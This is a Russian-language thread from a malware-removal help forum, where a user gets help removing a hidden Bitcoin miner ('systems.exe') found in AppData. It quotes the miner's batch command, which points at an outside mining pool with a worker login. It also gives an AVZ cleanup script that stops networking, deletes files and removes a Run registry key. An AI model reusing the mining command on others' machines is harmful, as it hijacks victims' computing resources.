Процесс Systems.exe нагружает процессор на 100%. [not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur ]

[raz0812]

Здравствуйте.
Столкнулся сегодня с одной странностью. Дело в том, что на моем рабочем столе находится виджет индикатора ЦП и Оперативной памяти (стандартный от Win 7). И сегодня я заметил, что ЦП по непонятным причинам был нагружен полностью, до 100%.
Зашел в диспетчер задач, отсортировав процессы по "нагруженности", увидел, что 95-99% процессора использует файл "systems.exe" (именно systems, а не system), появившийся не понятно откуда. Открыл место хранения файла (C:\Users\Саша\AppData\Local\svchost\miner) и вижу, что файлик появился совсем недавно (на тот момент как я это заметил, с момента создания прошло 8-10 минут). Полез в гугл и нашел подобные проблемы (bitcoin-miner), но именно такой как у меня не увидел. У людей, насколько я понял процесс называется по разному. Или "explorer.exe", или "svchost.exe" и т.д. Насторожило то, что у кого то начали шифроваться файлы. После этого я этот процесс убил.
Зашел на вирустотал и, как и ожидалось, файл оказался вирусом (34 из 57 антивирусов увидели в нем вирус). А мой от Microsoft (Essentials) ничего криминального не увидел.
Подскажите, как быть. Компьютер не перезагружал и файлики эти пока еще не удалил.

[Info_bot]

Уважаемый(ая) raz0812, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[thyrex]

Выполните скрипт в AVZ

Код:

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Users\Саша\AppData\Local\svchost\services.exe','');
 DeleteFile('C:\Users\Саша\AppData\Local\svchost\services.exe','32');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','svchost');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.

Компьютер перезагрузится.

Пришлите карантин согласно Приложения 2 правил по красной ссылке Прислать запрошенный карантин над первым сообщением темы.

Сделайте новые логи по правилам

[raz0812]

Сделал. Процесс не появился после перезагрузки. И на карантине файла services.exe нету. Ошибка какая-то проскочила при выполнении скрипта. Высылаю логи.

upd: Как я понял на карантине и не появится этот файл, потому что его и нет совсем. Есть только такие:

C:\Users\Саша\AppData\Local\svchost\miner\libcurl-4.dll
libwinpthread-1.dll
start.bat
systems.exe
zlib1.dll

и сам архив, из которого все это и разархивировалось C:\Users\Саша\AppData\Local\svchost\ciner.zip

Могу отправить экзешник systems, если нужно.
Содержимое батника кстати очень интересное:

systems --algo=scrypt --url=stratum+tcp://stratum.khore.org:3336 --userpass=alex0097.1:x

[thyrex]

Всю папку

C:\Users\Саша\AppData\Local\svchost

заархивируйте с паролем virus и пришлите по красной ссылке Прислать запрошенный карантин над первым сообщением темы.

Затем эту папку удалите

[raz0812]

Готово.

[thyrex]

Что с проблемой после удаления папки?

[raz0812]

Все нормально, проблем больше не возникало! Только вот одного понять не могу, где я его таки хапнул... Большое спасибо Вам!

[CyberHelper]

Статистика проведенного лечения:

• Получено карантинов: 1
• Обработано файлов: 5
• В ходе лечения обнаружены вредоносные программы:
  
  1. \miner\systems.exe - not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur ( DrWEB: Tool.BtcMine.433, BitDefender: Application.BitCoinMiner.FP )